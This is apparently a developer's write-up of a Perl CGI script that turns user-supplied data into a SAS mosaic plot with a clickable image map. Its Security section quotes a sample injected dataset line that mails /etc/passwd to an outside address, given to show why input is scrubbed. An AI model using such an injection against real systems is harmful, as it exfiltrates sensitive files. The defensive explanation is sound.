Mosaics: About This Weblet

mosaics was written as a Perl server-based CGI script. It could have been written as a Java application, and provide a somewhat nicer user interface, but that would limit the application to those with Java-capable browsers. Think of it as a Weblet for the Java-challenged .

Sources

How Does it Work?

The entire thing is done by the CGI script. After printing the forms, the program:
  1. retrieves the input parameters from the CGI query.
  2. reads and parses the data, either from a sample file, from the form, or from an uploaded file.
  3. writes a SAS program, interpolating the user's data into a template,
  4. runs the program (by a system() call) producing a PostScript file, and one or more files containing the imagemap information.
  5. converts each Postscript page to a gif image.
  6. reads the imagemap information, massaging it into the form of a client-side image map.
  7. reads and parses the SAS listing file to extract the Model summary information.
  8. returns the image to the browser, together with links to the SAS program, the output listing file, and a small JavaScript function which activates the imagemap.
I cribbed the basic structure from my Sieve Diagram script, but had learned a bit in the interim.

Data Structure

Most form-based web applications need to get only a few numbers or selections from the user, and it is not difficult to validate these, either in the server CGI script or with Try it too].

It is considerably harder to provide a general method for the user to input a dataset -- a table consisting of an arbitrary number of numeric or character variables with an arbitrary number of observations (rows). In the mosaics application, we need to:

SAS datasets consist of a data table plus a data dictionary and mosaics constructs something similar using a "hash", a Perl data structure like an association list.

The %dataset structure is shown below

Contents Perl constructor
Dataset title (string) $dataset->{TITLE} = $title;
Number of rows (scalar) $dataset->{ROWS} = $rows;
Number of columns (scalar)$dataset->{COLS} = scalar @col_type;
Variable names (list) $dataset->{VARS} = [ @vars ];
Number of rows (scalar)$dataset->{TYPE} = [ @col_type ];
Variable field width (list)$dataset->{LENGTH} = [ @col_length ];
Data table (string)$dataset->{DATA} = join("\n", @data);
The data table itself is parsed as a list of its rows (@data), but then stored as a newline-delimited string. Variable types are stored as 'C' or 'N', with the rule that a variable is considered character if any row contains non-numeric (/-?\d+/) characters.

Security

Always a problem when dealing with form- or uploaded-data which is passed to another program. We wouldn't like to be on the receiving end of a "dataset" which contained the following
Fee Fie   Fo  Fum 234
Ima Gonna Get Ya  123
;;;; x "mail -s 'HaHa' cracker@net.net </etc/passwd";
The data therefore is scrubbed to remove all characters which should not appear in ordinary data.

SAS Data Step

This data structure makes it fairly simple to perform some reasonable (but rudimentary) validation on the dataset and variables, and to construct the SAS data step in a general way:
	@vars = @{$dataset->{VARS}};
	@type = @{$dataset->{TYPE}};
	foreach $i (0..$#vars) {             # construct input variable list
		$invar .= $vars[$i];
		$invar .= $type[$i] eq 'C' ? ' $ ' : ' ';
	}

	$datastep = <<END_OF_DATASTEP
data temp;
	input $invar;
datalines;
$data
END_OF_DATASTEP
;
So, if the variables are HAIR, EYE, SEX (all character) and COUNT, the data step becomes:
data temp;
	input HAIR $ EYE $ SEX $ COUNT;
datalines;
Brown Black M  32
 ...

Imagemapping

MOSAICS.SAS maintains a table of the coordinates of all tiles in the mosaic display. I wrote an add-in module to convert these coordinates to a format which could be used as a client-side image map. This was not straight-forward, because:
  • The mosaic uses a coordinate system with (0,0) as the lower left corner of the bottom-left tile and (100,100) as the upper right corner of the top-right tile. Imagemaps use a coordinate system in pixels, with (0,0) as the top-left corner.
  • That wouldn't be hard, except that there seems to be no reliable way in SAS/IML to determine the bounding box of the entire figure when the labels and title are added around the mosaic tiles. This introduces slight errors in the imagemap coordinates of the boxes, but they are now not perceptible except at high magnification.
Nonetheless, the SAS module does its best and produces a table containing one row for each tile in the mosaic, with the cell label, imagemap coordinates, and cell statistics (observed frequency, fitted frequency, residual) in the following format (chosen to be particular easy to parse in Perl):
Black:Brown|   69  435  211  915|    68   40.1    4.4
Black:Blue |   69  266  211  407|    20   39.2   -3.1
Black:Hazel|   69  131  211  237|    15   17.0   -0.5
Black:Green|   69   68  211  103|     5   11.7   -2.0
Brown:Brown|  239  598  614  915|   119  106.3    1.2
Brown:Blue |  239  346  614  570|    84  103.9   -1.9
Brown:Hazel|  239  173  614  317|    54   44.9    1.4
  ...
Since the SAS program cannot know the size of the final GIF image, it uses coordinates in the range of (0..1000). mosaics extracts the acutal size of the image from the GIF file itself, and rescales these to the proper range.

mosaics uses these rescaled coordinates to produce a client-side image map, of the form,

<map name="mos1168i1">
  <area shape=rect coords="0,20,42,276"
   href="javascript:Show('Black','108','148.0','-3.3');">
  <area shape=rect coords="51,20,165,276"
   href="javascript:Show('Brown','286','148.0','11.3');">
  <area shape=rect coords="174,20,202,276"
    href="javascript:Show('Red','71','148.0','-6.3');">
  <area shape=rect coords="211,20,262,276" 
   href="javascript:Show('Blond','127','148.0','-1.7');">
  <area shape=default href="javascript:Show('Select a cell','','','');"
	 onMouseOver="window.status='Select a cell'; return true;">
</map>
The GIF image is connected to the image map by including the USEMAP= attribute in the <IMG> tag.

To Do

  • Add the ability to reorder the variables in the dataset. [Done, but not well tested]
  • Improve error trapping, particularly for entered or uploaded data.
  • Figure out how to serve each graph on a separate page, with controls to navigate from one to the next.